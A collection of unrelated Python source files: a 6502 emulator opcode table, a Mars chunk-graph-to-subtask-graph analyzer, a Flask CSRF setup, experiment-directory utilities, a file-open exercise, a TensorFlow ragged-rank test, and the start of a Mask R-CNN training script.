    OpCode(0x15, 'ORA', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0x0d, 'ORA', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0x1d, 'ORA', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0x19, 'ORA', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0x01, 'ORA', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0x11, 'ORA', 2, 5, AddressingMode.Indirect_Y),
    # --- Shifts
    OpCode(0x0a, 'ASL', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x06, 'ASL', 2, 5, AddressingMode.ZeroPage),
    OpCode(0x16, 'ASL', 2, 6, AddressingMode.ZeroPage_X),
    OpCode(0x0e, 'ASL', 3, 6, AddressingMode.Absolute),
    OpCode(0x1e, 'ASL', 3, 7, AddressingMode.Absolute_X),
    # ---
    OpCode(0x4a, 'LSR', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x46, 'LSR', 2, 5, AddressingMode.ZeroPage),
    OpCode(0x56, 'LSR', 2, 6, AddressingMode.ZeroPage_X),
    OpCode(0x4e, 'LSR', 3, 6, AddressingMode.Absolute),
    OpCode(0x5e, 'LSR', 3, 7, AddressingMode.Absolute_X),
    # ---
    OpCode(0x2a, 'ROL', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x26, 'ROL', 2, 5, AddressingMode.ZeroPage),
    OpCode(0x36, 'ROL', 2, 6, AddressingMode.ZeroPage_X),
    OpCode(0x2e, 'ROL', 3, 6, AddressingMode.Absolute),
    OpCode(0x3e, 'ROL', 3, 7, AddressingMode.Absolute_X),
    # ---
    OpCode(0x6a, 'ROR', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x66, 'ROR', 2, 5, AddressingMode.ZeroPage),
    OpCode(0x76, 'ROR', 2, 6, AddressingMode.ZeroPage_X),
    OpCode(0x6e, 'ROR', 3, 6, AddressingMode.Absolute),
    OpCode(0x7e, 'ROR', 3, 7, AddressingMode.Absolute_X),
    # ---
    OpCode(0xe6, 'INC', 2, 5, AddressingMode.ZeroPage),
    OpCode(0xf6, 'INC', 2, 6, AddressingMode.ZeroPage_X),
    OpCode(0xee, 'INC', 3, 6, AddressingMode.Absolute),
    OpCode(0xfe, 'INC', 3, 7, AddressingMode.Absolute_X),
    # ---
    OpCode(0xe8, 'INX', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0xc8, 'INY', 1, 2, AddressingMode.NoneAddressing),
    # ---
    OpCode(0xc6, 'DEC', 2, 5, AddressingMode.ZeroPage),
    OpCode(0xd6, 'DEC', 2, 6, AddressingMode.ZeroPage_X),
    OpCode(0xce, 'DEC', 3, 6, AddressingMode.Absolute),
    OpCode(0xde, 'DEC', 3, 7, AddressingMode.Absolute_X),
    # ---
    OpCode(0xca, 'DEX', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x88, 'DEY', 1, 2, AddressingMode.NoneAddressing),
    # ---
    OpCode(0xc9, 'CMP', 2, 2, AddressingMode.Immediate),
    OpCode(0xc5, 'CMP', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xd5, 'CMP', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0xcd, 'CMP', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0xdd, 'CMP', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0xd9, 'CMP', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0xc1, 'CMP', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0xd1, 'CMP', 2, 5, AddressingMode.Indirect_Y),
    # ---
    OpCode(0xc0, 'CPY', 2, 2, AddressingMode.Immediate),
    OpCode(0xc4, 'CPY', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xcc, 'CPY', 3, 4, AddressingMode.Absolute),
    # ---
    OpCode(0xe0, 'CPX', 2, 2, AddressingMode.Immediate),
    OpCode(0xe4, 'CPX', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xec, 'CPX', 3, 4, AddressingMode.Absolute),
    # --- Branching
    # //AddressingMode that acts as Immidiate
    OpCode(0x4c, 'JMP', 3, 3, AddressingMode.NoneAddressing),
    # //AddressingMode:Indirect with 6502 bug
    OpCode(0x6c, 'JMP', 3, 5, AddressingMode.NoneAddressing),
    OpCode(0x20, 'JSR', 3, 6, AddressingMode.NoneAddressing),
    OpCode(0x60, 'RTS', 1, 6, AddressingMode.NoneAddressing),
    OpCode(0x40, 'RTI', 1, 6, AddressingMode.NoneAddressing),
    # ---
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0xd0, 'BNE', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0x70, 'BVS', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0x50, 'BVC', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0x30, 'BMI', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0xf0, 'BEQ', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0xb0, 'BCS', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0x90, 'BCC', 2, 2, AddressingMode.NoneAddressing),
    # /*(+1 if branch succeeds +2 if to a new page)*/
    OpCode(0x10, 'BPL', 2, 2, AddressingMode.NoneAddressing),
    # ---
    OpCode(0x24, 'BIT', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x2c, 'BIT', 3, 4, AddressingMode.Absolute),
    # --- Stores, Loads
    OpCode(0xa9, 'LDA', 2, 2, AddressingMode.Immediate),
    OpCode(0xa5, 'LDA', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xb5, 'LDA', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0xad, 'LDA', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0xbd, 'LDA', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0xb9, 'LDA', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0xa1, 'LDA', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0xb1, 'LDA', 2, 5, AddressingMode.Indirect_Y),
    # ---
    OpCode(0xa2, 'LDX', 2, 2, AddressingMode.Immediate),
    OpCode(0xa6, 'LDX', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xb6, 'LDX', 2, 4, AddressingMode.ZeroPage_Y),
    OpCode(0xae, 'LDX', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0xbe, 'LDX', 3, 4, AddressingMode.Absolute_Y),
    # ---
    OpCode(0xa0, 'LDY', 2, 2, AddressingMode.Immediate),
    OpCode(0xa4, 'LDY', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xb4, 'LDY', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0xac, 'LDY', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0xbc, 'LDY', 3, 4, AddressingMode.Absolute_X),
    # ---
    OpCode(0x85, 'STA', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x95, 'STA', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0x8d, 'STA', 3, 4, AddressingMode.Absolute),
    OpCode(0x9d, 'STA', 3, 5, AddressingMode.Absolute_X),
    OpCode(0x99, 'STA', 3, 5, AddressingMode.Absolute_Y),
    OpCode(0x81, 'STA', 2, 6, AddressingMode.Indirect_X),
    OpCode(0x91, 'STA', 2, 6, AddressingMode.Indirect_Y),
    # ---
    OpCode(0x86, 'STX', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x96, 'STX', 2, 4, AddressingMode.ZeroPage_Y),
    OpCode(0x8e, 'STX', 3, 4, AddressingMode.Absolute),
    # ---
    OpCode(0x84, 'STY', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x94, 'STY', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0x8c, 'STY', 3, 4, AddressingMode.Absolute),
    # --- Flags clear
    OpCode(0xD8, 'CLD', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x58, 'CLI', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0xb8, 'CLV', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x18, 'CLC', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x38, 'SEC', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x78, 'SEI', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0xf8, 'SED', 1, 2, AddressingMode.NoneAddressing),
    # ---
    OpCode(0xaa, 'TAX', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0xa8, 'TAY', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0xba, 'TSX', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x8a, 'TXA', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x9a, 'TXS', 1, 2, AddressingMode.NoneAddressing),
    OpCode(0x98, 'TYA', 1, 2, AddressingMode.NoneAddressing),
    # --- Stack
    OpCode(0x48, 'PHA', 1, 3, AddressingMode.NoneAddressing),
    OpCode(0x68, 'PLA', 1, 4, AddressingMode.NoneAddressing),
    OpCode(0x08, 'PHP', 1, 3, AddressingMode.NoneAddressing),
    OpCode(0x28, 'PLP', 1, 4, AddressingMode.NoneAddressing),
]
# Fast opcode-byte -> OpCode lookup, derived from the master table.
OPCODES_MAP = {cpuop.code: cpuop for cpuop in CPU_OPS_CODES}

if __name__ == '__main__':
    pass
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import logging
from collections import deque, defaultdict
from typing import Dict, List, Tuple, Type, Union
from ....config import Config
from ....core import ChunkGraph, ChunkType, enter_mode
from ....core.operand import (
Fetch,
VirtualOperand,
LogicKeyGenerator,
MapReduceOperand,
OperandStage,
)
from ....resource import Resource
from ....typing import BandType, OperandType
from ....utils import build_fetch, tokenize
from ...subtask import SubtaskGraph, Subtask
from ..core import Task, new_task_id
from .assigner import AbstractGraphAssigner, GraphAssigner
from .fusion import Coloring
logger = logging.getLogger(__name__)
def need_reassign_worker(op: OperandType) -> bool:
    """Return True if ``op`` must be assigned a worker by the assigner.

    Besides ops explicitly flagged with ``reassign_worker``, every reducer
    (a :class:`MapReduceOperand` in the reduce stage) is included.  Reducer
    ops are frequently copied from tileable ops and only afterwards have
    their stage set to reduce, so forcing ``reassign_worker = True`` at that
    point (e.g. by overriding ``__setattr__``) would be far more intrusive
    than special-casing them here.
    """
    if op.reassign_worker:
        return True
    return isinstance(op, MapReduceOperand) and op.stage == OperandStage.reduce
class GraphAnalyzer:
    """Analyze a chunk graph and turn it into a subtask graph.

    The analyzer assigns start/reassigned chunks to bands, colors chunks
    (optionally fusing chunks that share a color), and emits one subtask per
    color group, wired together by data dependencies.
    """

    def __init__(
        self,
        chunk_graph: ChunkGraph,
        band_resource: Dict[BandType, Resource],
        task: Task,
        config: Config,
        chunk_to_subtasks: Dict[ChunkType, Subtask],
        graph_assigner_cls: Type[AbstractGraphAssigner] = None,
        stage_id: str = None,
    ):
        self._chunk_graph = chunk_graph
        self._band_resource = band_resource
        self._task = task
        self._stage_id = stage_id
        self._config = config
        self._fuse_enabled = task.fuse_enabled
        self._extra_config = task.extra_config
        self._chunk_to_subtasks = chunk_to_subtasks
        # Fall back to the default assigner when none was supplied.
        if graph_assigner_cls is None:
            graph_assigner_cls = GraphAssigner
        self._graph_assigner_cls = graph_assigner_cls
        # Maps original chunks to the copies placed into subtask chunk graphs.
        self._chunk_to_copied = dict()
        self._logic_key_generator = LogicKeyGenerator()

    @classmethod
    def _iter_start_ops(cls, chunk_graph: ChunkGraph):
        """Yield the ops of independent (predecessor-less) chunks.

        Chunks are discovered in a DFS order seeded by the graph's
        independent chunks; each start op is yielded once, de-duplicated
        by op key.
        """
        visited = set()
        op_keys = set()
        start_chunks = deque(chunk_graph.iter_indep())
        stack = deque([start_chunks.popleft()])
        while stack:
            chunk = stack.popleft()
            if chunk not in visited:
                inp_chunks = chunk_graph.predecessors(chunk)
                if not inp_chunks or all(
                    inp_chunk in visited for inp_chunk in inp_chunks
                ):
                    if len(inp_chunks) == 0:
                        op_key = chunk.op.key
                        if op_key not in op_keys:
                            op_keys.add(op_key)
                            yield chunk.op
                    visited.add(chunk)
                    stack.extend(c for c in chunk_graph[chunk] if c not in visited)
                else:
                    # Some predecessors not visited yet: requeue this chunk
                    # behind its unvisited predecessors.
                    stack.appendleft(chunk)
                    stack.extendleft(
                        reversed(
                            [
                                c
                                for c in chunk_graph.predecessors(chunk)
                                if c not in visited
                            ]
                        )
                    )
            # Current component exhausted; move on to the next start chunk.
            if not stack and start_chunks:
                stack.appendleft(start_chunks.popleft())

    @classmethod
    def _gen_input_chunks(
        cls,
        inp_chunks: List[ChunkType],
        chunk_to_fetch_chunk: Dict[ChunkType, ChunkType],
    ) -> List[ChunkType]:
        """Return fetch chunks standing in for ``inp_chunks``.

        ``chunk_to_fetch_chunk`` acts as a cache so each source chunk gets
        at most one fetch chunk; chunks that already are Fetch ops are
        reused as-is.
        """
        # gen fetch chunks for input chunks
        inp_fetch_chunks = []
        for inp_chunk in inp_chunks:
            if inp_chunk in chunk_to_fetch_chunk:
                inp_fetch_chunks.append(chunk_to_fetch_chunk[inp_chunk])
            elif isinstance(inp_chunk.op, Fetch):
                chunk_to_fetch_chunk[inp_chunk] = inp_chunk
                inp_fetch_chunks.append(inp_chunk)
            else:
                fetch_chunk = build_fetch(inp_chunk).data
                chunk_to_fetch_chunk[inp_chunk] = fetch_chunk
                inp_fetch_chunks.append(fetch_chunk)
        return inp_fetch_chunks

    @staticmethod
    def _to_band(band_or_worker: Union[BandType, str]) -> BandType:
        """Normalize a worker address or band tuple to a band tuple.

        A bare worker address is paired with the default "numa-0" band.
        """
        if isinstance(band_or_worker, tuple) and len(band_or_worker) == 2:
            # band already
            return band_or_worker
        else:
            return band_or_worker, "numa-0"

    def _gen_subtask_info(
        self,
        chunks: List[ChunkType],
        chunk_to_subtask: Dict[ChunkType, Subtask],
        chunk_to_bands: Dict[ChunkType, BandType],
        chunk_to_fetch_chunk: Dict[ChunkType, ChunkType],
    ) -> Tuple[Subtask, List[Subtask]]:
        """Build one Subtask from a group of same-colored chunks.

        Copies the chunks (and their ops) into a fresh chunk graph, wires
        in fetch chunks for out-of-scope inputs, and aggregates per-chunk
        properties (band, priority, retryability, virtualness), asserting
        that chunks sharing a color do not conflict on them.

        Returns the new subtask and the list of input subtasks it depends on.
        """
        # gen subtask and its input subtasks
        final_result_chunks_set = set(self._chunk_graph.result_chunks)
        chunks_set = set(chunks)
        result_chunks = []
        result_chunks_set = set()
        chunk_graph = ChunkGraph(result_chunks)
        out_of_scope_chunks = []
        chunk_to_copied = self._chunk_to_copied
        update_meta_chunks = []
        # subtask properties
        band = None
        is_virtual = None
        retryable = True
        chunk_priority = None
        expect_worker = None
        bands_specified = None
        processed = set()
        for chunk in chunks:
            if chunk in processed:
                continue
            if expect_worker is None:
                expect_worker = chunk.op.expect_worker
                bands_specified = expect_worker is not None
            else:  # pragma: no cover
                assert (
                    chunk.op.expect_worker is None
                    or expect_worker == chunk.op.expect_worker
                ), (
                    f"expect_worker {chunk.op.expect_worker} conflicts with chunks that have same color: "
                    f"{expect_worker}"
                )
            # process band
            chunk_band = chunk_to_bands.get(chunk)
            if chunk_band is not None:
                assert (
                    band is None or band == chunk_band
                ), "band conflicts with chunks that have same color"
                band = chunk_band
            # process is_virtual
            if isinstance(chunk.op, VirtualOperand):
                assert is_virtual is None, "only 1 virtual operand can exist"
                is_virtual = True
            else:
                is_virtual = False
            # process retryable
            if not chunk.op.retryable:
                retryable = False
            # process priority
            if chunk.op.priority is not None:
                assert (
                    chunk_priority is None or chunk_priority == chunk.op.priority
                ), "priority conflicts with chunks that have same color"
                chunk_priority = chunk.op.priority
            # process input chunks
            inp_chunks = []
            build_fetch_index_to_chunks = dict()
            for i, inp_chunk in enumerate(chunk.inputs):
                if inp_chunk in chunks_set:
                    inp_chunks.append(chunk_to_copied[inp_chunk])
                else:
                    build_fetch_index_to_chunks[i] = inp_chunk
                    inp_chunks.append(None)
                    if not isinstance(inp_chunk.op, Fetch):
                        out_of_scope_chunks.append(inp_chunk)
            fetch_chunks = self._gen_input_chunks(
                list(build_fetch_index_to_chunks.values()), chunk_to_fetch_chunk
            )
            # Fill fetch chunks back into the input slots reserved above.
            for i, fetch_chunk in zip(build_fetch_index_to_chunks, fetch_chunks):
                inp_chunks[i] = fetch_chunk
            copied_op = chunk.op.copy()
            copied_op._key = chunk.op.key
            out_chunks = [
                c.data
                for c in copied_op.new_chunks(
                    inp_chunks, kws=[c.params.copy() for c in chunk.op.outputs]
                )
            ]
            for src_chunk, out_chunk in zip(chunk.op.outputs, out_chunks):
                processed.add(src_chunk)
                out_chunk._key = src_chunk.key
                chunk_graph.add_node(out_chunk)
                # cannot be copied twice
                assert src_chunk not in chunk_to_copied
                chunk_to_copied[src_chunk] = out_chunk
                if src_chunk in final_result_chunks_set:
                    if out_chunk not in result_chunks_set:
                        # add to result chunks
                        result_chunks.append(out_chunk)
                        # chunk is in the result chunks of full chunk graph
                        # meta need to be updated
                        update_meta_chunks.append(out_chunk)
                        result_chunks_set.add(out_chunk)
                if not is_virtual:
                    # skip adding fetch chunk to chunk graph when op is virtual operand
                    for c in inp_chunks:
                        if c not in chunk_graph:
                            chunk_graph.add_node(c)
                        chunk_graph.add_edge(c, out_chunk)
        # add chunks with no successors into result chunks
        result_chunks.extend(
            c
            for c in chunk_graph.iter_indep(reverse=True)
            if c not in result_chunks_set
        )
        # Explicit expect_worker takes precedence over the assigned band.
        expect_bands = (
            [self._to_band(expect_worker)]
            if bands_specified
            else ([band] if band is not None else None)
        )
        # calculate priority
        if out_of_scope_chunks:
            inp_subtasks = []
            for out_of_scope_chunk in out_of_scope_chunks:
                copied_out_of_scope_chunk = chunk_to_copied[out_of_scope_chunk]
                inp_subtask = chunk_to_subtask[out_of_scope_chunk]
                if (
                    copied_out_of_scope_chunk
                    not in inp_subtask.chunk_graph.result_chunks
                ):
                    # make sure the chunk that out of scope
                    # is in the input subtask's results,
                    # or the meta may be lost
                    inp_subtask.chunk_graph.result_chunks.append(
                        copied_out_of_scope_chunk
                    )
                inp_subtasks.append(inp_subtask)
            depth = max(st.priority[0] for st in inp_subtasks) + 1
        else:
            inp_subtasks = []
            depth = 0
        # Priority orders first by graph depth, then by chunk priority.
        priority = (depth, chunk_priority or 0)
        subtask = Subtask(
            subtask_id=new_task_id(),
            stage_id=self._stage_id,
            logic_key=self._gen_logic_key(chunks),
            session_id=self._task.session_id,
            task_id=self._task.task_id,
            chunk_graph=chunk_graph,
            expect_bands=expect_bands,
            bands_specified=bands_specified,
            virtual=is_virtual,
            priority=priority,
            retryable=retryable,
            update_meta_chunks=update_meta_chunks,
            extra_config=self._extra_config,
        )
        return subtask, inp_subtasks

    def _gen_logic_key(self, chunks: List[ChunkType]):
        """Combine the logic keys of all chunk ops into one token."""
        return tokenize(
            *[self._logic_key_generator.get_logic_key(chunk.op) for chunk in chunks]
        )

    @enter_mode(build=True)
    def gen_subtask_graph(
        self, op_to_bands: Dict[str, BandType] = None
    ) -> SubtaskGraph:
        """
        Analyze chunk graph and generate subtask graph.

        Parameters
        ----------
        op_to_bands: dict
            Optional mapping from op key to band, overriding the
            assigner's initial assignments.

        Returns
        -------
        subtask_graph: SubtaskGraph
            Subtask graph.
        """
        # reassign worker when specified reassign_worker = True
        # or it's a reducer operands
        reassign_worker_ops = [
            chunk.op for chunk in self._chunk_graph if need_reassign_worker(chunk.op)
        ]
        start_ops = (
            list(self._iter_start_ops(self._chunk_graph))
            if len(self._chunk_graph) > 0
            else []
        )
        # assign start chunks
        to_assign_ops = start_ops + reassign_worker_ops
        assigner = self._graph_assigner_cls(
            self._chunk_graph, to_assign_ops, self._band_resource
        )
        # assign expect workers
        cur_assigns = {
            op.key: self._to_band(op.expect_worker)
            for op in start_ops
            if op.expect_worker is not None
        }
        if op_to_bands:
            cur_assigns.update(op_to_bands)
        logger.debug(
            "Start to assign %s start chunks for task %s",
            len(start_ops),
            self._task.task_id,
        )
        chunk_to_bands = assigner.assign(cur_assigns=cur_assigns)
        logger.debug(
            "Assigned %s start chunks for task %s", len(start_ops), self._task.task_id
        )
        # assign expect workers for those specified with `expect_worker`
        # skip `start_ops`, which have been assigned before
        start_ops_set = set(start_ops)
        for chunk in self._chunk_graph:
            if chunk not in start_ops_set and chunk.op.expect_worker is not None:
                chunk_to_bands[chunk] = self._to_band(chunk.op.expect_worker)
        # color nodes
        if self._fuse_enabled:
            logger.debug("Start to fuse chunks for task %s", self._task.task_id)
            # sort start chunks in coloring as start_ops
            op_key_to_chunks = defaultdict(list)
            for chunk in self._chunk_graph:
                op_key_to_chunks[chunk.op.key].append(chunk)
            init_chunk_to_bands = dict()
            for start_op in start_ops:
                for start_chunk in op_key_to_chunks[start_op.key]:
                    init_chunk_to_bands[start_chunk] = chunk_to_bands[start_chunk]
            coloring = Coloring(
                self._chunk_graph,
                list(self._band_resource),
                init_chunk_to_bands,
                initial_same_color_num=getattr(
                    self._config, "initial_same_color_num", None
                ),
                as_broadcaster_successor_num=getattr(
                    self._config, "as_broadcaster_successor_num", None
                ),
            )
            chunk_to_colors = coloring.color()
        else:
            # if not fuse enabled, color all chunks with different colors
            op_to_colors = dict()
            chunk_to_colors = dict()
            color_gen = itertools.count()
            for c in self._chunk_graph.topological_iter():
                if c.op not in op_to_colors:
                    chunk_to_colors[c] = op_to_colors[c.op] = next(color_gen)
                else:
                    chunk_to_colors[c] = op_to_colors[c.op]
        # Group chunks by color; Fetch chunks never form subtasks themselves.
        color_to_chunks = defaultdict(list)
        for chunk, color in chunk_to_colors.items():
            if not isinstance(chunk.op, Fetch):
                color_to_chunks[color].append(chunk)
        # gen subtask graph
        subtask_graph = SubtaskGraph()
        chunk_to_fetch_chunk = dict()
        chunk_to_subtask = self._chunk_to_subtasks
        # states
        visited = set()
        logic_key_to_subtasks = defaultdict(list)
        for chunk in self._chunk_graph.topological_iter():
            if chunk in visited or isinstance(chunk.op, Fetch):
                # skip fetch chunk
                continue
            color = chunk_to_colors[chunk]
            same_color_chunks = color_to_chunks[color]
            if all(isinstance(c.op, Fetch) for c in same_color_chunks):
                # all fetch ops, no need to gen subtask
                continue
            subtask, inp_subtasks = self._gen_subtask_info(
                same_color_chunks,
                chunk_to_subtask,
                chunk_to_bands,
                chunk_to_fetch_chunk,
            )
            subtask_graph.add_node(subtask)
            logic_key_to_subtasks[subtask.logic_key].append(subtask)
            for inp_subtask in inp_subtasks:
                subtask_graph.add_edge(inp_subtask, subtask)
            for c in same_color_chunks:
                chunk_to_subtask[c] = subtask
            visited.update(same_color_chunks)
        # Number subtasks that share a logic key for parallelism bookkeeping.
        for subtasks in logic_key_to_subtasks.values():
            for logic_index, subtask in enumerate(subtasks):
                subtask.logic_index = logic_index
                subtask.logic_parallelism = len(subtasks)
        return subtask_graph
|
# -*- coding: utf-8 -*-
"""
extensions.py
:copyright: (c) 2017 by Joe Paul.
:license: see LICENSE for details.
"""
from flask_wtf.csrf import CSRFProtect
# Module-level CSRF protection extension; initialized against the Flask app
# elsewhere (via csrf_protect.init_app(app)).
csrf_protect = CSRFProtect()
|
"""
Utils related to different file operations
Creation Date: April 2020
Creator: Mafuba09
"""
# imports...
import os
import time
EXPERIMENTS_FOLDER = 'experiments'


def get_experiment_dir(script_file_path: str, sub_name: str = '') -> str:
    """
    Create (if needed) and return a result directory for one experiment run.

    The directory name is derived from the calling script's base name
    (e.g. ``cifar`` for ``cifar10.py``) plus the current UTC timestamp,
    so multiple runs of the same task remain distinguishable.

    :param script_file_path: path of the calling script, used to derive the task name
    :param sub_name: optional string prepended to describe the experiment
    :return: path to the experiment directory
    """
    now = time.gmtime()
    # Base name of the calling script, without its extension.
    task_name = os.path.splitext(os.path.split(script_file_path)[-1])[0]
    run_name = '{}_{}{:02d}{:02d}_{:02d}{:02d}{:02d}'.format(
        task_name, now.tm_year, now.tm_mon, now.tm_mday,
        now.tm_hour, now.tm_min, now.tm_sec)
    out_dir = '.' + os.sep + EXPERIMENTS_FOLDER + os.sep + sub_name + run_name
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    return out_dir
def get_latest_experiment_dir(file_path=None) -> str:
    """
    Get the latest experiment folder.

    If ``file_path`` is given and exists, it is returned unchanged.
    Otherwise the ``experiments`` folder is scanned and the entry that
    sorts highest is returned (directory names embed a timestamp, so
    reverse lexicographic order corresponds to most recent).

    :param file_path: custom path to a folder with a *.h5 file
    :return: path to the latest experiment directory, or '' if none exists
    """
    if file_path is not None and os.path.exists(file_path):
        return file_path
    print('Checking experiment folder!')
    experiment_folder = os.path.join('.', EXPERIMENTS_FOLDER)
    # Guard clauses replace the original structure, where the final return
    # read ``experiment_dirs[0]`` outside the branch that bound it and only
    # avoided an UnboundLocalError because every other path returned early.
    if not os.path.exists(experiment_folder):
        return ''
    experiment_dirs = os.listdir(experiment_folder)
    experiment_dirs.sort(reverse=True)  # sort highest (latest) first
    if not experiment_dirs:
        return ''
    return os.path.join(experiment_folder, str(experiment_dirs[0]))
|
# Relative (Windows-style) path to the lab resource file to probe.
path = '.\\08-File-Handling-Lab-Resources\\File Opener\\text.txt'

try:
    # Use a context manager so the handle is always closed; the original
    # called open() and leaked the file object.
    with open(path, 'r') as file:
        print('File found')
except FileNotFoundError:
    print('File not found')
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ragged.rank op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.framework import test_util
from tensorflow.python.ops.ragged import ragged_array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_test_util
from tensorflow.python.platform import googletest
@test_util.run_all_in_graph_and_eager_modes
class RaggedRankOpTest(ragged_test_util.RaggedTensorTestCase,
                       parameterized.TestCase):
  """Parameterized tests for ragged_array_ops.rank over ranks 0 through 4."""

  @parameterized.parameters([
      # Rank 0
      dict(
          test_input=1,
          expected_rank=0,
      ),
      # Rank 1
      dict(
          test_input=[1],
          expected_rank=1,
      ),
      dict(
          test_input=[1, 2, 3, 4],
          expected_rank=1,
      ),
      # Rank 2
      dict(
          test_input=[[1], [2], [3]],
          expected_rank=2,
      ),
      # Rank 3
      dict(
          test_input=[[[1], [2, 3]], [[4], [5, 6, 7]]],
          expected_rank=3,
      ),
      # Rank 3, ragged_rank=2
      dict(
          test_input=[[[1], [2, 3], [10, 20]],
                      [[4], [5, 6, 7]]],
          expected_rank=3,
          ragged_rank=2,
      ),
      # Rank 4, ragged_rank=3 with dimensions: {2, (1, 2), (2), (1, 2)}
      # NOTE(review): no explicit ragged_rank is passed here despite the
      # comment above — presumably the default inferred ragged_rank is 3;
      # confirm against ragged_factory_ops.constant.
      dict(
          test_input=[[[[1], [2]]],
                      [[[3, 4], [5, 6]], [[7, 8], [9, 10]]]],
          expected_rank=4,
      ),
      # Rank 4, ragged_rank=2 with dimensions: {2, (1, 2), (1, 2), 2}
      dict(
          test_input=[
              [[[1, 2]]],
              [[[5, 6], [7, 8]],
               [[9, 10], [11, 12]]]],
          expected_rank=4,
          ragged_rank=2,
      ),
  ])
  def testRaggedRank(self, test_input, expected_rank, ragged_rank=None):
    """Builds a RaggedTensor from test_input and checks rank() matches."""
    test_input = ragged_factory_ops.constant(
        test_input, ragged_rank=ragged_rank)
    self.assertAllEqual(ragged_array_ops.rank(
        test_input), expected_rank)
# Run the test suite when executed directly.
if __name__ == '__main__':
  googletest.main()
|
"""
Mask R-CNN
Train on the LIP dataset
------------------------------------------------------------
Usage: import the module (see Jupyter notebooks for examples), or run from
the command line as such:
# Train a new model starting from pre-trained COCO weights
python3 humanparsing.py train --dataset=/path/to/humanparsing/dataset --weights=coco
# Resume training a model that you had trained earlier
python3 humanparsing.py train --dataset=/path/to/humanparsing/dataset --weights=last
# Train a new model starting from ImageNet weights
python3 humanparsing.py train --dataset=/path/to/humanparsing/dataset --weights=imagenet
"""
import os
import sys
import json
import datetime
import numpy as np
import skimage.draw
import cv2 as cv
import imgaug
import tensorflow as tf
# os.environ['CUDA_VISIBLE_DEVICES'] = '0'
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import model as modellib, utils
# Directory to save logs and model checkpoints, if not provided
# through the command line argument --logs
